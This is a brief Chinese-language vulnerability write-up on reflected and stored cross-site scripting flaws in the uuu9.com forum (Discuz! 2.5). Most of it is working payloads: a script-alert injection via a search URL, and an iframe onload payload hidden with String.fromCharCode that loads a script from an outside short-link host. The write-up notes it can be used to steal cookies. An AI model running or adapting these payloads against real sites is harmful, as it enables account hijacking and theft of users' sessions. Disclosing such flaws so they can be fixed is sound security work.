游久论坛采用的是discuz! 2.5
反射型XSS:
http://bbs.uuu9.com/plugin.php?id=auction&action=search
在搜索框中输入
"><script>alert(1)</script>
存储型:
http://bbs.uuu9.com/forum.php?mod=viewthread&tid=10381268
方法:
插入flash
发现 可以把xss 代码转换成unicode执行
http://1.com/1.swf
后面接 "><iframe/onload="document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,54,46,97,109,47,99,119,76,83,49,52,34,62,60,47,115,99,114,105,112,116,62));">
把上面的代码转换成unicode就是
合起来提交的就是
插入的xss代码自由发挥
可用来盗cookie